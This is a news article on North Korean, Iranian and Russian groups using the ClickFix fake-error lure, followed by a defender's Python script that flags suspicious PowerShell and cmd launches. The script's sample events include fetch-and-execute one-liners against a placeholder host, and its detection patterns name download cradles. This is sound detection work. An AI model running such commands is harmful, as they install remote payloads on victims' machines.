According to fresh intelligence from Proofpoint and Microsoft, a new wave of sophisticated cyber-espionage campaigns is leveraging a deceptive social engineering tactic known as ClickFix.
Advanced persistent threat (APT) groups from North Korea, Iran, and Russia are all adopting the technique.
ClickFix attacks typically impersonate legitimate platforms like Google Drive or Microsoft Office, using phishing or malvertising to lure targets to malicious websites. Victims are presented with fake error messages claiming a download or document failed, prompting them to click a “Fix” button. This leads to manual execution of PowerShell or command-line scripts, which silently install malware or backdoors onto the victim’s device.
Among the groups using ClickFix is Kimsuky, a North Korean APT, which Microsoft linked to fake “device registration” pages. Between January and February 2025, Kimsuky targeted think tanks with phishing emails impersonating Japanese diplomats. Once trust was established, targets were tricked into copying and running PowerShell commands that deployed QuasarRAT and created scheduled tasks for persistence, while a decoy PDF was displayed to the victim.
Meanwhile, Iranian group MuddyWater targeted 39 Middle Eastern organizations in November 2024 using spoofed Microsoft alerts. The emails tricked recipients into running PowerShell with administrator privileges, infecting systems with ‘Level,’ a remote monitoring tool that supported the group’s espionage efforts. Similarly, Russian actors UNK_RemoteRogue and APT28 used ClickFix in late 2024, spoofing Microsoft Word and Google services to install malware via Empire C2 and Metasploit.
ClickFix’s growing adoption across state-backed APTs underscores its effectiveness—and the danger of copying unfamiliar commands from web prompts. Cybersecurity experts urge users to exercise caution and avoid executing unsolicited scripts, especially with administrative privileges.
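The attack chain described above (a user pasting a copied PowerShell or command-line one-liner that fetches and runs a payload) leaves a recognisable footprint in process-creation telemetry. The following is an added defender-side example, not code from the article or from any of the vendors it cites: it scores Sysmon-style process-creation events for the traits of a ClickFix-launched shell (hidden window, execution-policy bypass, download cradle, in-memory execution, encoded command, and an interactive parent such as explorer.exe). The field names and sample events are constructed for illustration; the indicator list is a starting point, not a complete signature.

```python
import re

# Constructed sample events (hypothetical data, not telemetry from the campaigns above).
# Fields mirror Sysmon Event ID 1: parent image, child image, full command line.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -ep bypass -c "iex (iwr https://example.invalid/fix.ps1)"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": 'cmd /c "curl -s https://example.invalid/f.vbs -o %TEMP%\\f.vbs && wscript %TEMP%\\f.vbs"'},
    {"parent": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -NoProfile -File build.ps1"},  # benign developer activity
]

# Parents that indicate a human typed or pasted the command (Run dialog, File Explorer).
INTERACTIVE_PARENTS = ("explorer.exe",)

# Command-line traits typical of a pasted "fix" one-liner. Each is weak alone;
# the combination with an interactive parent is what makes the event interesting.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
    "download_cradle": re.compile(r"\b(?:iwr|invoke-webrequest|downloadstring|curl|certutil|bitsadmin)\b", re.I),
    "in_memory_exec": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "encoded_command": re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
}


def score_event(event):
    """Return the names of every indicator matched by one process-creation event."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(event["cmdline"])]
    parent = event["parent"].rsplit("\\", 1)[-1].lower()
    # Only count the parent when the command line itself already looks suspicious,
    # so ordinary shells opened from Explorer do not trigger on their own.
    if hits and parent in INTERACTIVE_PARENTS:
        hits.append("interactive_parent")
    return hits


def find_suspicious(events, min_hits=2):
    """Return (cmdline, matched indicators) for events reaching the hit threshold."""
    return [(e["cmdline"], score_event(e)) for e in events if len(score_event(e)) >= min_hits]


if __name__ == "__main__":
    for cmdline, hits in find_suspicious(SAMPLE_EVENTS):
        print(f"{', '.join(hits)}: {cmdline}")
```

Tune `min_hits` and the parent list to your environment; an elevated child process (the "run as admin" step in the MuddyWater campaign) is a further signal worth adding if your telemetry records integrity level.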
State-Backed Hackers Ramp Up 'ClickFix' Attacks in Global Espionage Campaigns
Bijay Pokharel